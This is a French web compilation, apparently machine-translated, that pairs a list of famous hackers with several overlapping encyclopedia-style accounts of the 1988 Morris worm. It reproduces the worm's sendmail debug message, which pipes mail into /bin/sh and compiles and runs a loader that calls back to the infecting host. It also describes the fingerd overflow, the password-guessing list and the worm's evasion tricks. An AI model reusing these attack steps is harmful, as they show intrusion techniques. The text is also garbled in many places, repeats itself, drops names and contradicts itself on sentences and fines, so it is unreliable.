Qu’est-ce qu’un ver Morris ? "Morris Worm" : l'histoire du virus, son principe de fonctionnement et des faits intéressants. Et Morris ?

13.04.2019

Plus nous dépendons de la technologie, plus les pirates informatiques potentiels ont de pouvoir sur nous. Peu importe que leur objectif soit d'aider ou de causer du tort, ces gars-là ont la capacité de changer le monde comme bon leur semble. Ils peuvent rester insaisissables et toujours dans l’ombre, et de nombreux hackers préfèrent cette vie, mais il existe quelques hackers vraiment brillants dont les noms sont connus du public.

1. Robert Tappan Morris

Même si tu n'y connais presque rien virus informatiques, vous avez probablement entendu parler de ce qu’on appelle les « vers ». La première personne à avoir lancé un tel virus sur le réseau fut Robert Tappan Morris.

Morris, étudiant diplômé de l'Université Cornell, a créé son propre « ver » et l'a diffusé sur le réseau le 2 novembre 1988, paralysant le travail de six mille ordinateurs aux États-Unis. Par la suite, il a affirmé qu'il voulait simplement voir à quel point Internet s'était développé et que ce qui s'était passé était les conséquences d'une expérience devenue incontrôlable. Cependant, le ver s'est avéré être bien plus qu'un simple test : il lisait /etc/passwd, essayant de deviner les mots de passe des utilisateurs. comptes. Morris a finalement été condamné à une amende et à trois ans de probation.

Morris est devenu plus tard professeur Université Harvard et l'auteur quantité énormeévolutions dans le domaine logiciel. Aujourd'hui, il est professeur d'informatique à l'Université du Massachusetts. Institut de technologie. Ce n’est pas une mauvaise carrière pour un hacker.

2. Kévin Mitnick

Tout a commencé lorsque Kevin Mitnick a soudainement voulu utiliser transports en commun gratuitement.

Mitnick a piraté le système de bus de Los Angeles en utilisant un faux document de voyage. Plus tard, à l'âge de 12 ans, il devient escroc au téléphone- au début je m'amusais à rediriger le signal téléphone à la maison dans un téléphone public et écouter les propriétaires de téléphones résidentiels se faire demander de déposer un centime avant d'appeler. Ensuite, j’ai commencé à appeler gratuitement partout où je voulais. Quelques années plus tard, Mitnik était déjà recherché dans tout le pays pour avoir piraté le réseau de Digital Equipment Corporation et volé ses programmes. Il s'agit peut-être de son premier piratage notable, mais plus tard, l'homme s'est également introduit dans les réseaux des géants du téléphone Nokia et Motorola.

Le FBI l'a arrêté en 1995 après avoir piraté un éminent expert américain en matière de sécurité informatique Tsutomu Shimomura. Mitnik a été condamné à cinq ans de prison et, à sa sortie de prison, il a commencé à travailler sur les questions de défense. systèmes informatiques et a fondé Defensive Thinking Inc., une société de sécurité informatique. Il a également écrit plusieurs livres sur les hackers.

3. Adrien Lamo

Oui, les entreprises engagent parfois des pirates informatiques pour tester les faiblesses de leurs systèmes, mais personne n'a jamais embauché Adrian Lamo.

En 2002 et 2003, Lamo a piraté les systèmes de plusieurs grandes entreprises juste pour le plaisir, puis informé les entreprises des erreurs dans leurs systèmes de sécurité. Parmi les cibles attaquées par le pirate informatique figuraient Microsoft, Yahoo et le New York Times, où il a ajouté son coordonnéesà la base de données des experts.

Connu comme le « hacker sans-abri », Lamo travaillait le plus souvent en se connectant à Internet dans les cybercafés et les bibliothèques publiques. Beaucoup pensent qu’il était animé par une soif de gloire. L'intrusion de Lamo dans le réseau du New York Times en 2003 l'a attiré l'attention des militants anti-cybercriminalité, et il a été arrêté et condamné à six mois d'assignation à résidence et à deux ans de probation. Lamo travaille désormais comme conférencier et journaliste réputé, ainsi que consultant indépendant en matière de sécurité, mais évite tout travail de bureau rémunéré.

4. Gary McKinnon (alias Solo)

Le hacker londonien Gary McKinnon, d'origine écossaise, n'agissait pas tant par plaisir que par la poursuite d'objectifs politiques.

En 2002, McKinnon a piraté les ordinateurs du Département américain de la Défense, de l'Armée, de la Marine, de l'Air Force et de la NASA. Par la suite, il a déclaré qu'il recherchait des preuves de dissimulation d'informations sur les ovnis, de dissimulation d'informations sur sources alternatives l'énergie et d'autres technologies potentiellement utiles à la société.

Ce n'est pas une blague. McKinnon a déclaré qu'il avait des raisons de croire que le gouvernement américain cache une technologie extraterrestre qui pourrait résoudre la crise énergétique mondiale. Cependant, le hacker autodidacte admet qu'il aurait pu supprimer « accidentellement » tout un tas d'autres fichiers et éventuellement en endommager certains. disques durs, tout en essayant de brouiller les traces. Cependant, il insiste toujours sur le fait que rien de spécial ne s’est produit.

Le gouvernement américain, à son tour, affirme que l'attaque de McKinnon a coûté 800 000 dollars et met également en doute le fait que le pirate informatique recherchait réellement des informations sur les ovnis. Les avocats britanniques qui ont placé Gary sous protection insistent sur le fait que leur client, qui souffre du syndrome d'Asperger, mérite un traitement spécial en raison de sa santé mentale instable.

5. (alias Curador)

Raphael Gray se qualifiait d'homme vertueux et insistait sur le fait qu'il essayait seulement d'aider les sites. commerce électronique quand j'ai piraté leurs bases de données pour voler des numéros cartes de crédit Et informations personnelles 26 000 clients américains, britanniques et canadiens en 2000.

L’adolescent gallois de 18 ans avait alors déclaré qu’il cherchait simplement à sensibiliser aux failles de sécurité. Certes, on ne sait pas exactement pourquoi, dans ce cas, il a publié les numéros de carte volés dans le domaine public sur Internet, mais c'est une autre question.

En 2001, Gray a été condamné à trois ans de traitement psychiatrique obligatoire.

6.

Sans exagération, Draper peut être qualifié de grand-père des hackers. Au début des années 1970, il est devenu considéré comme le « roi » des hooligans téléphoniques - c'est-à-dire qu'il a commis appels gratuits. À cette époque, Internet n’était pas encore très répandu et peu de gens disposaient ordinateurs personnels, alors Draper s'est occupé des téléphones.

Un pirate informatique a découvert qu'un sifflet jouet provenant d'une boîte de cornflakes émettait un son similaire à signal électrique accès au réseau téléphonique et a trouvé un moyen d'appeler gratuitement : composer numéro international et a sifflé. Le signal du coup de sifflet a coïncidé avec le signal réseau téléphonique et a informé le système que Draper avait raccroché. Ainsi, la ligne était considérée comme gratuite, et c'est tout d'autres actions les abonnés n’ont pas été enregistrés.

Après plusieurs expériences, John et ses amis Steve Wozniak et Steve Jobs (noms familiers, non ?) ont créé un appareil appelé « Blue Box », qui permet de simuler les sons du réseau téléphonique et de passer des appels gratuits. Draper écrivit plus tard le premier livre au monde éditeur de texte pour IBM PC "EasyWriter". Il dirige actuellement propre entreprise sur la sécurité informatique.

7. (alias Dark Dante)

Dans les années 1980, alors que le phreaking téléphonique devenait très populaire dans certains cercles, Poulsen a fait une farce pleine d'esprit sur la station de radio KIIS de Los Angeles en simulant plusieurs appels téléphoniques qui lui ont permis de gagner des prix prestigieux - un voyage à Hawaï et une Porsche.

Un peu plus tard, un pirate informatique a piraté la base de données du FBI et a eu accès à des informations classifiées concernant les écoutes téléphoniques, après quoi le FBI a commencé à le rechercher. En conséquence, Poulsen a été arrêté et condamné à cinq ans.

Il occupe actuellement le poste de rédacteur en chef du journal Wired News.

8.

En 2007, l’accès à Internet a soudainement disparu dans toute l’Estonie. Ce pays « petit mais très technophile » a imputé tout la responsabilité au gouvernement russe. À cette époque-là, il y avait de fréquentes émeutes en Estonie à cause du démantèlement des monuments soviétiques, il était donc tout à fait logique de soupçonner la Russie.

Les hackers responsables de ce cyberterrorisme ont eu accès à tous les ordinateurs du pays et les ont exploités, surchargeant tous les serveurs. Les guichets automatiques ne fonctionnaient pas, les pages Web ne s'ouvraient pas, systèmes gouvernementaux a dû fermer.

Il a fallu plusieurs semaines aux autorités estoniennes pour trouver les coupables. Il s’est avéré que l’agitation avait été provoquée par un certain Dmitry Galushkevich, un Russe de souche âgé de 20 ans vivant en Estonie. Il n’a jamais été possible de savoir s’il avait provoqué cette agitation seul ou avec un groupe de personnes partageant les mêmes idées. Galushkevich lui-même a été condamné à une amende de 17 500 couronnes (environ 45 000 roubles).

9. (alias camarade)

Sur la liste des systèmes informatiques qui doivent être incroyablement protégés pour que pas un seul ne passe génie informatique, sans aucun doute, le système du département américain de la Défense est à l'honneur. Cependant, le hacker américain Jonathan James a piraté ce système et est entré dans leur serveur. Le gars avait 15 ans à cette époque.

Les 29 et 30 juin 1999, James attaque la NASA. Il a pu surfer librement sur l’ensemble du réseau et voler plusieurs fichiers, dont le code source de la station orbitale internationale. Bien sûr, la NASA a lancé une opération à grande échelle pour attraper le pirate informatique, et James a été rapidement arrêté. La NASA a estimé les dégâts à 1,7 million de dollars.

Étant donné que James n'était pas un adulte, il a été condamné à seulement six mois de prison et a également été contraint de renoncer à utiliser les ordinateurs.

Malheureusement, James n'est plus en vie. Il est décédé le 18 mai 2008 dans des circonstances mystérieuses. La cause officielle du décès est le suicide, mais des rumeurs courent selon lesquelles le pirate informatique intraitable aurait été « supprimé » par les agences gouvernementales.

10.

En 2002, le Deceptive Duo (un groupe de deux personnes - Benjamin Stark, 20 ans, et Robert Little, 18 ans) a mené un certain nombre de piratages très médiatisés dans les réseaux gouvernementaux, notamment la marine américaine, la NASA, le FAA et ministère de la Défense.

Comme beaucoup d’autres pirates informatiques, Stark et Little ont affirmé qu’ils voulaient simplement signaler des failles de sécurité et ainsi aider leur pays. Deux pirates ont laissé des messages dans ces systèmes et publié des adresses sur des ressources bien connues e-mail des fonctionnaires et des sites Web gouvernementaux classifiés dans le but d'attirer l'attention du gouvernement. Et ils ont été attirés.

En 2006, les deux hackers ont plaidé coupable. Stark a été condamné à deux ans de prison avec sursis, Little à quatre mois avec sursis avec trois ans de probation, et tous deux ont été condamnés à payer des dizaines de milliers de dollars de dommages et intérêts.

Il y a 21 ans, se produisait un événement qui restera à jamais gravé dans l’histoire d’Internet.

Le 2 novembre 1988, 99 lignes de code ont provoqué pendant deux jours une paralysie de choc chez des personnes encore jeunes et inexpérimentées en matière de sécurité Internet.

Environ 6 000 machines VAX exécutant les systèmes d'exploitation SUN et BSD UNIX ont été infectées par une infection sans précédent. De nombreux administrateurs ont été contraints d'éteindre leurs employés afin d'arrêter d'une manière ou d'une autre la surcharge des ordinateurs et la propagation des infections.
C'était le ver Morris ou simplement Grand ver. En raison des effets dévastateurs que cela a eu sur Internet, tant en termes de temps d'arrêt général systèmes et impact psychologique sur l'idée de sécurité et de fiabilité sur le réseau (par analogie avec les Grands Vers de Tolkien). La surprise de l’attaque et certains des mécanismes intégrés au ver ont mis de nombreux administrateurs de l’époque en haleine. états émotionnels. Les réactions allaient de « éteignez tout ! » au paniqué « nous sommes attaqués ! »

Le créateur et initiateur du ver, alors étudiant à l'Université Cornell, Robert Morris Jr. (l'aîné à l'époque faisait exactement le contraire des choses, il était directeur scientifique du NCSC (National Computer Centre de sécurité)) j'ai lancé mon monstre depuis l'ordinateur du MIT (prep.ai.mit.edu - une machine avec accès libre) afin de ne pas attirer l'attention sur votre université. La raison pour laquelle il a fait cela restera à jamais un mystère. Selon ses propres déclarations, il s’agissait simplement d’une expérience devenue incontrôlable. Cependant, à proprement parler, le Ver n’a causé aucun dommage direct.

Une petite liste d'ordinateurs attaqués

MIT, Université du Minnesota, Caroline du Nord, Université de Pittsburgh, machines de RAND Corporation, Stanford, Berkeley, Université Carnegie Mellon, Université du Maryland, Université de Pennsylvanie, MIT encore, machines du laboratoire de recherche balistique, Université d'État du Colorado et Université Purdue et bien d'autres. .

Vecteurs d'attaque de vers

Pour se propager, le ver a utilisé plusieurs moyens différents, qui se résumaient à exploiter les vulnérabilités et à simplement deviner les mots de passe d'accès.

Le ver se composait de deux parties : un chargeur (99 lignes en C) et un noyau composé de deux modules binaires - du code compilé pour BSD et le même code uniquement pour l'architecture Sun. Les noms de toutes les procédures internes avaient des noms significatifs (par exemple, doit ou cracksome), ce qui rendait le démontage des binaires assez facile à l'avenir.

Le ver a injecté une copie de lui-même sur des ordinateurs distants et l'a lancée. Chaque ordinateur infecté cherchait à infecter toutes les autres machines qui lui étaient connectées. Le ver a été conçu pour être utilisé sur BSD UNIX et SUN-3. Ayant découvert que ces machines étaient connectées à celle infectée, le ver a copié sur ordinateur distant, lancé là-bas, essayant d'obtenir un accès maximal à l'information (en l'utilisant uniquement pour continuer le piratage), et a infecté les machines voisines. Se propageant comme une avalanche réseau non sécurisé le ver multipliait ses copies en totale conformité avec la théorie des mécanismes d'auto-réplication, dont les bases ont été posées par John von Neumann.

Au début, personne n'a rien compris, mais au bout de quelques heures les administrateurs les plus avancés ont commencé à agir du mieux qu'ils pouvaient, certains ont déconnecté leurs services du réseau et ont tenté de les redémarrer dans l'espoir de soulager la surcharge (ce qui a été complètement en vain , puisque lors du redémarrage du système, le ver a créé plusieurs copies supplémentaires de lui-même et la charge du système n'a fait qu'augmenter), quelqu'un s'est précipité en panique, envoyant des messages aux listes de diffusion - "Nous sommes attaqués!" (ce qui était également en vain, car à cause des actions du ver, les listes n'avaient pas fonctionné depuis plusieurs heures), et quelqu'un cherchait les raisons de la propagation instantanée du ver.

À Berkeley, dès le soir du même jour, ils se sont rendu compte que l'attaque était menée via rsh et sendmail. Par mesure de précaution, le blocage des services réseau commence.

Après un certain temps, réalisant l'ampleur du problème, Morris informe ses amis d'une expérience devenue incontrôlable. Après un certain temps, un message anonyme est apparu sur la liste de diffusion TCP-IP, décrivant brièvement comment arrêter le ver. L'affiche (Andy Sudduth) a envoyé ce message après conversation téléphonique avec Morris, mais en raison de la surcharge du réseau et de l'ordinateur, la lettre n'a pas été envoyée avant environ une journée.

Bientôt, différentes personnes ont commencé à découvrir de manière indépendante les vecteurs d'attaque du ver.

Le démon sendmail a été vidé en premier. Keith Bostic publie une alerte de ver et des correctifs sendmail sur la liste de diffusion TCP-IP, le groupe de discussion 4bsd-ucb-fixes et plusieurs administrateurs système.

Le ver utilisait la fonction « debug » du démon sendmail, qui définissait le mode de débogage pour la session de communication en cours. Fonctionnalité supplémentaire le mode débogage consiste à envoyer des messages accompagnés d'un programme destinataire qui s'exécute sur une machine distante et reçoit le message. Cette fonctionnalité, non fournie par le protocole SMTP, était utilisée par les développeurs pour déboguer le programme et dans version de travail a été laissé par erreur.

Grâce à sendmail, le ver a infecté deux types d'ordinateurs - VAX et Sun, ils ont donc été envoyés codes binaires pour chaque architecture, les deux ont été lancées, mais une seule a pu être exécutée. Sur les ordinateurs d'autres architectures, les programmes ne pouvaient pas fonctionner, même s'ils absorbaient ressources système au moment de la compilation.

Quelques heures plus tard, il s'est avéré que les correctifs sendmail n'aidaient pas : les ordinateurs étaient infectés d'une autre manière. En raison des actions du ver, MILNET et ARPANET sont déconnectés.

Après quelques heures supplémentaires différentes personnes différents laboratoires ont découvert indépendamment une vulnérabilité et ont mis au point des correctifs pour le démon fingerd.

extrait de code du doigt :

{
char buf :
...
obtient(buf);
}

Il s’agit d’une situation classique de débordement de tampon (ce n’était apparemment pas encore un classique). Le ver a transmis une chaîne spécialement préparée de 536 octets, qui a finalement appelé la fonction execve (« /bin/sh », 0, 0). De la manière spécifiée Seules les machines VAX exécutant le système d'exploitation 4.3 BSD ont été attaquées ; ces attaques ont échoué sur les ordinateurs Sun.

Mais ce n'est pas tout. Dans les niks, à l'époque comme aujourd'hui, il existe un ensemble de services pour l'exécution de programmes à distance ; aujourd'hui, ssh est utilisé à ces fins, puis sa place a été occupée par les soi-disant programmes r. La plupart point vulnérable ils ont eu l'idée de la « confiance » - les utilisateurs d'ordinateurs qui étaient sur le « nœuds de confiance", avaient le droit d'exécuter leurs programmes sur une machine "de confiance" sans aucun chèque supplémentaire. De plus, la relation de confiance était souvent réciproque. Le ver a essayé d'utiliser le lanceur d'interprète distant rsh pour attaquer d'autres machines avec le nom d'utilisateur et le mot de passe obtenus. utilisateur actuel ou sans authentification du tout, si la machine attaquée « faisait confiance » à celle-ci.

Ainsi, le ver a pénétré les machines voisines à partir de la machine infectée en utilisant un trou dans sendmail, un trou dans fingerd ou « trust » et rsh. Lors de la pénétration de l'ordinateur attaqué, un bootloader a été envoyé, une commande pour compiler et exécuter le bootloader, et tout effacer fichiers temporaires. Ensuite, le chargeur a récupéré les trois fichiers et a essayé de lancer d'abord l'un, puis l'autre. Si aucun des deux corps ne démarrait, le chargeur de démarrage les effaçait tout simplement et cessait de fonctionner.

Une fois lancé, le ver s'est déguisé de toutes les manières possibles - il a effacé son fichier exécutable, a chiffré les deux corps, les a lus en mémoire et les a également effacés du disque et, dans la mesure du possible, a modifié les informations le concernant dans la table de processus. .

Ensuite, des informations ont été recueillies sur interfaces réseau de l'ordinateur infecté et sur les ordinateurs voisins, et certains voisins ont fait l'objet de tentatives d'infection. Ceux qui ont été infectés avec succès ont été marqués comme infectés ; ceux qui n’ont pas pu être infectés sont considérés comme « immunisés ». Bien qu’ici les experts aient tendance à voir une erreur dans le code du ver, puisque la section du code chargée d’empêcher la réinfection des machines contenait de nombreuses erreurs.

Cela a été d'une importance capitale pour la viabilité du ver : de nombreuses machines ont été réinfectées, la charge sur les systèmes et le réseau a augmenté et est devenue très perceptible, conduisant souvent à un déni de service, à la suite duquel le ver lui-même a été détecté. et neutralisé beaucoup plus rapidement que s'il n'y avait pas d'infections répétées, bien que les machines infectées à plusieurs reprises propagent le ver plus rapidement, probablement proportionnellement au nombre de copies du ver sur la machine, ce qui a affecté la vitesse fulgurante de propagation, et les dénis de service ont conduit à panique et défaillance de certains nœuds clés, à la suite de quoi le réseau s'est temporairement effondré en sous-réseaux .

La sélection des mots de passe était assez simple, mais en même temps, de manière efficace: quatre variantes du thème de connexion utilisateur ont été utilisées, ainsi qu'une liste d'environ 200 à 400 mots. Selon certaines informations, sur ordinateurs séparés plus de la moitié des mots de passe ont été déchiffrés de cette façon.

Dans la soirée du 5 novembre, la majeure partie des ganglions infectés avaient été guéris, des patchs avaient été appliqués et, à Berkeley, les spécialistes étaient en plein travail pour disséquer la carcasse sans vie du ver.

Au moment où le FBI réalisa qui était coupable de ce qui s'était passé, Morris était déjà sur le point de se rendre.

Une trace dans l'histoire

Ce fut un choc pour la communauté informatique. Ont été révisés fondamentaux sécurité informatique. Les dommages causés par le ver Morris ont été estimés à environ 100 millions de dollars (de telles estimations doivent être traitées avec beaucoup de prudence, car on ne sait pas quelles sont les méthodes utilisées pour les évaluer, quels paramètres sont pris en compte et lesquels ne le sont pas).

Selon certaines sources, le Ver est le seul dans l'histoire programme informatique, qui a déplacé les informations sur l'élection présidentielle américaine dans les premières pages. De nombreuses institutions et organisations ont été déconnectées d’Internet pendant plusieurs semaines, voire plusieurs mois. Les administrateurs, n'ayant aucune idée de l'ampleur réelle du danger, ont décidé de jouer la sécurité.

La mesure la plus raisonnable pour contrecarrer le piratage provoqué par le ver était la formation

Distribué via Internet. Écrit par Robert Tappan Morris, étudiant diplômé de Cornell, et lancé le 2 novembre 1988.

Il s’agit du premier virus à retenir une attention particulière dans les médias. médias de masse. Cela a également abouti à la première condamnation aux États-Unis en vertu du Computer Fraud and Abuse Act de 1986.

Histoire de l'apparition

Selon le plan de l'auteur, le ver était censé infecter uniquement les ordinateurs VAX équipés des systèmes d'exploitation 4BSD et Sun 3. Cependant, le code C portable donnait au ver la possibilité de s'exécuter sur d'autres ordinateurs.

Conséquences

Les dommages causés par le ver Morris ont été estimés à environ 96,5 millions de dollars.

Morris lui-même a gardé secret le code du programme et il est peu probable que quiconque puisse prouver son implication. Cependant, son père, informaticien à l'Agence nationale de sécurité, a estimé qu'il valait mieux que son fils avoue tout.

Au procès, Robert Morris a été condamné à cinq ans de prison et à une amende de 250 000 dollars. Cependant, compte tenu des circonstances atténuantes, le tribunal l'a condamné à trois ans de probation, à une amende de 10 000 dollars et à 400 heures de travaux d'intérêt général.

L'épidémie a montré à quel point il est dangereux de faire confiance inconditionnellement réseaux informatiques. Par la suite, de nouvelles normes de sécurité informatique plus strictes ont été élaborées concernant la sécurité du code des programmes, l'administration des nœuds de réseau et la sélection de mots de passe sécurisés.

La base de cette page est sur Wikipédia. Le texte est disponible sous licence CC BY-SA 4.0. Les médias non textuels sont disponibles sous leurs propres licences. Wikipédia® - enregistré marque déposée Fondation Wikimédia, Inc.

Le 2 novembre 1988, le réseau ARPANET a été attaqué par un programme qui deviendra plus tard connu sous le nom de « ver Morris » – du nom de son créateur, Robert Morris Jr, étudiant à l'Université Cornell. L'ARPANET (Advanced Research Projects Agency Network) a été créé en 1969 à l'initiative de l'Agence des Projets de Recherche Avancée du Département de la Défense des États-Unis (DARPA, Defense Advanced Research Projects Agency) et était le prototype d'Internet. Ce réseau a été créé dans l'intérêt des chercheurs du domaine technologie informatique et des technologies d'échange de messages, ainsi que des programmes et des ensembles de données entre les grands centres de recherche, laboratoires, universités, organisations gouvernementales et entreprises privées effectuant des travaux dans l'intérêt du département américain de la Défense (DoD, Département de la Défense des États-Unis). C'est à la demande du DoD que l'un des trois protocoles les plus courants a été développé couche de transport Modèle OSI, appelé TCP/IP, devenu le principal d'ARPANET en 1983. À la fin des années 80, le réseau comptait plusieurs dizaines de milliers d'ordinateurs. ARPANET a cessé d'exister en juin 1990.
Le ver Morris a été le premier logiciel malveillant de l'histoire de l'informatique à utiliser des mécanismes. distribution automatique sur le réseau. À cette fin, plusieurs vulnérabilités des services réseau ont été utilisées, ainsi que certaines points faibles systèmes informatiques, en raison d'une attention insuffisante portée aux problèmes de sécurité à cette époque.

Selon Robert Morris, le ver a été créé à des fins de recherche. Son code ne contenait aucune « payload » (fonctions destructrices). Cependant, en raison d'erreurs dans les algorithmes de fonctionnement, la propagation du ver a provoqué ce que l'on appelle un « déni de service », lorsque les ordinateurs étaient occupés à exécuter de nombreuses copies du ver et ne répondaient plus aux commandes des opérateurs. Le ver Morris a pratiquement paralysé le travail des ordinateurs du réseau ARPANET pendant cinq jours maximum. Le temps d'arrêt estimé est d'au moins 8 millions d'heures et plus d'un million d'heures sont consacrées à la restauration des fonctionnalités des systèmes. Pertes totales en équivalent monétaire ont été estimées à 98 millions de dollars, ils ont additionné leurs pertes directes et indirectes.
Pertes directes incluses (32 millions de dollars) :
arrêter, tester et redémarrer 42 700 machines ;
identification, suppression, nettoyage de la mémoire et restauration de 6 200 machines ;
analyse, démontage et documentation du code du ver ;
réparation des systèmes UNIX et tests.
Pertes indirectes incluses (66 millions de dollars) :
perte de temps informatique due au manque d'accès au réseau ;
perte d'accès des utilisateurs au réseau.
Cependant, ces évaluations doivent être traitées avec beaucoup de prudence.
Structurellement, le ver se composait de trois parties : une « tête » et deux « queues ». La « tête » était source en C (99 lignes) et compilé directement sur la machine distante. Les "queues" étaient identiques, du point de vue code source et les algorithmes, fichiers binaires, mais compilé sous différents types architecture Selon le plan de Morris, VAX et SUN ont été choisis comme plates-formes matérielles cibles. La « tête » a été coulée en utilisant les méthodes suivantes :

utiliser le mode débogage dans sendmail ;
exploitation d'une vulnérabilité de débordement de mémoire tampon dans le service réseau Fingerd ;
sélection du login et du mot de passe pour l'exécution à distance de programmes (rexec) ;
appeler à distance interpréteur de commandes(rsh) en devinant un identifiant et un mot de passe ou en utilisant un mécanisme de confiance.

Sendmail est le plus ancien service réseau, qui traite la réception et l'envoi du courrier par Protocole SMTP. Au moment où le ver s'est propagé, Sendmail avait fonctionnalité non documentée- les développeurs ont programmé un mode de débogage, qui n'aurait pas dû figurer dans la version de travail du programme et a été laissé par erreur. L'une des fonctionnalités du mode débogage était que le message électronique était traité non pas par Sendmail lui-même, mais par un autre programme. Exemple message électronique envoyé par le ver :
déboguer
courrier de :
reçu :<"|sed-e "1,/^$/d" | /bin/sh; exit 0">
données
cd /usr/tmp
chat >x14481910.c<<"EOF"
<текст программы l1.c>
EOF
cc -o x14481910 x14481910.s; x14481910 128.32.134.16 32341 8712440 ; rm -f x14481910 x14481910.c
.
quitter
Comme vous pouvez le voir, les en-têtes ont été supprimés du corps de la lettre (à l'aide du préprocesseur de texte sed) et le fichier de code source « head » a été enregistré. Ensuite, le processeur de commandes a reçu des instructions pour compiler le code « principal », exécuter le fichier exécutable résultant et effacer les fichiers temporaires.
Pour exploiter la vulnérabilité du service Fingerd, le ver a transmis une chaîne spécialement préparée de 536 octets, qui a finalement appelé la fonction execve("/bin/sh", 0, 0). Cela ne fonctionnait que pour les ordinateurs VAX exécutant 4.3BSD ; les ordinateurs SUN exécutant SunOS ne présentaient pas cette vulnérabilité.
Pour utiliser la méthode de distribution rexec et rsh, une liste d'utilisateurs de machines locales a été collectée. Sur cette base, les mots de passe les plus fréquemment utilisés ont été sélectionnés, dans l'espoir que de nombreux utilisateurs aient les mêmes noms et mots de passe sur toutes les machines du réseau, ce qui s'est toutefois avéré n'être pas loin de la vérité. En plus de la sélection, rsh utilisait un mécanisme de confiance, ou sinon un mécanisme d'authentification simplifié basé sur l'adresse IP de la machine distante. Ces adresses étaient stockées dans les fichiers /etc/hosts.equiv et .rhosts. Pour la plupart des ordinateurs, la confiance était mutuelle, donc avec un degré de probabilité élevé, la liste des adresses IP de ces fichiers trouvées par le ver permettait de se connecter au système distant via rsh sans utiliser de mot de passe du tout.
Lors de la recherche, le ver a essayé les options de mot de passe suivantes :

vide;
nom d'utilisateur (utilisateur);
nom d'utilisateur épelé à l'envers (resu) ;
double répétition du nom d'utilisateur (useruser);
le prénom ou le nom de l'utilisateur (John, Smith) ;
le prénom ou le nom de l'utilisateur en minuscules (john, smith) ;
dictionnaire intégré de 432 mots ;
fichier /usr/dict/words, contenant environ 24 000 mots et utilisé sur 4.3BSD (et autres) comme dictionnaire orthographique. Si le mot commence par une lettre majuscule, alors la version avec une lettre minuscule a également été vérifiée.

L'utilisation intégrée de plusieurs méthodes de distribution a considérablement influencé la propagation massive du ver à travers le réseau. Pour rechercher des ordinateurs distants, le réseau a été analysé sur la base des informations de la table de routage et de la propre adresse IP du système infecté.
Le ver a utilisé plusieurs techniques pour rendre sa détection difficile par les administrateurs informatiques :

supprimer votre fichier exécutable après le lancement ;
tous les messages d'erreur ont été désactivés et la taille du vidage sur incident a été définie sur zéro ;
le fichier exécutable du ver a été enregistré sous le nom sh, le même nom utilisé par l'interpréteur de commandes Bourne Shell, cachant ainsi le ver dans la liste des processus ;
environ toutes les trois minutes, un thread enfant était généré et le thread parent était arrêté, le pid du processus du ver changeant constamment et le temps d'exécution affiché dans la liste des processus étant réinitialisé ;
toutes les chaînes de texte ont été codées à l'aide de l'opération xor 81h.

Malgré la « grandeur » de l’idée, le ver comportait quelques erreurs, tant dans la conception que dans la mise en œuvre. C'est un algorithme mal implémenté pour vérifier si le système était déjà infecté qui a conduit à la propagation massive du ver sur le réseau, contrairement à l'intention de son auteur. Dans la pratique, les ordinateurs ont été infectés à plusieurs reprises, ce qui, d'une part, a entraîné un épuisement rapide des ressources et, d'autre part, a contribué à la propagation du ver dans le réseau, en forme d'avalanche. Selon certaines estimations, le ver Morris aurait infecté environ 6 200 ordinateurs. Le promoteur lui-même, conscient de l'ampleur des résultats de son action, s'est volontairement rendu aux autorités et a tout raconté. L'audience dans son affaire s'est terminée le 22 janvier 1990. Morris risquait initialement jusqu'à cinq ans de prison et une amende de 25 000 $. En fait, la peine a été assez clémente : le tribunal a ordonné 400 heures de travaux d'intérêt général, une amende de 10 000 $, une période probatoire de trois ans et le paiement des frais liés à la surveillance du condamné.
L'incident avec le « ver Morris » a obligé les informaticiens à réfléchir sérieusement aux problèmes de sécurité, en particulier, c'est après cela que, pour augmenter la sécurité du système, l'utilisation de pauses après la saisie incorrecte d'un mot de passe et le stockage des mots de passe dans /etc/shadow, où ils ont été déplacés du statut lisible, ont commencé à être introduits par tous les utilisateurs du fichier /etc/passwd. Mais l'événement le plus important a été la création en novembre 1988 du Centre de coordination du CERT (CERT/CC), dont les activités sont liées à la résolution des problèmes de sécurité sur Internet. Le premier bulletin de sécurité du CERT à paraître date de décembre 1988, faisant état des vulnérabilités exploitées par le ver. Il est à noter que de nombreuses solutions techniques utilisées par le ver Morris, telles que l'utilisation de la force brute du mot de passe, la compilation du code du chargeur de démarrage sur un ordinateur distant exécutant des systèmes *NIX (Slapper), l'analyse du réseau pour identifier les cibles, etc. Ils sont également utilisés dans des exemples modernes de logiciels malveillants.
Il est intéressant de noter que dans le même 1988, le célèbre programmeur Peter Norton s'est prononcé assez vivement dans la presse contre le fait même de l'existence de virus informatiques, les qualifiant de « mythe » et comparant le bruit autour de ce sujet avec des « histoires de crocodiles ». vivant dans les égouts de New York. Deux ans seulement après l'annonce de Norton, en 1990, la première version du programme antivirus Norton AntiVirus est sortie.
Et enfin, en 1988, impressionnée par l'attaque du ver Morris, l'American Computer Equipment Association a déclaré le 30 novembre la Journée internationale de la sécurité informatique, qui est célébrée encore aujourd'hui.

Ce ver a été nommé Ver de Morris nommé d'après son auteur (Robert T. Morris, étudiant diplômé de Cornell Computer Science). Les pirates l’ont surnommé le « grand ver ».

L'épidémie a touché environ six mille nœuds ARPANET. Les meilleurs spécialistes de la sécurité informatique de l'époque étaient invités de tout le pays pour neutraliser les conséquences des effets malveillants du virus. L'analyse du code du programme démonté n'a révélé aucune bombe logique ni aucune fonction destructrice.

Action du ver

Le ver, contrairement aux calculs de son créateur, a littéralement inondé tout le trafic du réseau ARPANET.

L’épidémie a montré à quel point il est dangereux de faire confiance inconditionnellement aux réseaux informatiques. Par la suite, de nouvelles normes de sécurité informatique plus strictes ont été élaborées concernant la sécurité du code des programmes, l'administration des nœuds de réseau et la sélection de mots de passe sécurisés.

Links

Fondation Wikimédia.

2010.

Voyez ce qu'est le « Morris Worm » dans d'autres dictionnaires :

Ce terme a d'autres significations, voir Worms (significations). Un ver de réseau est un type de programme malveillant qui se propage de manière indépendante via les réseaux informatiques locaux et mondiaux. Table des matières 1 Histoire 2 Mécanismes ... ... Wikipédia

Un ver de réseau est un type de programme informatique auto-répliquant qui se propage dans les réseaux informatiques locaux et mondiaux. Contrairement aux virus informatiques, un ver est un programme distinct. Table des matières 1 Histoire 2 Mécanismes ... Wikipédia

Une disquette avec le code source du ver Morris, conservée au Musée des Sciences de Boston Le 2 novembre 1988, le premier cas d'apparition et de marche « victorieuse » d'un ver de réseau a été enregistré, paralysant le travail de six personnes. mille nœuds Internet aux États-Unis. Plus tard dans les médias, ceci... ... Wikipédia

Un virus informatique est un type de programme informatique dont la particularité est la capacité de se reproduire (auto-réplication). En plus de cela, les virus peuvent endommager ou détruire complètement tous les fichiers et données... ... Wikipédia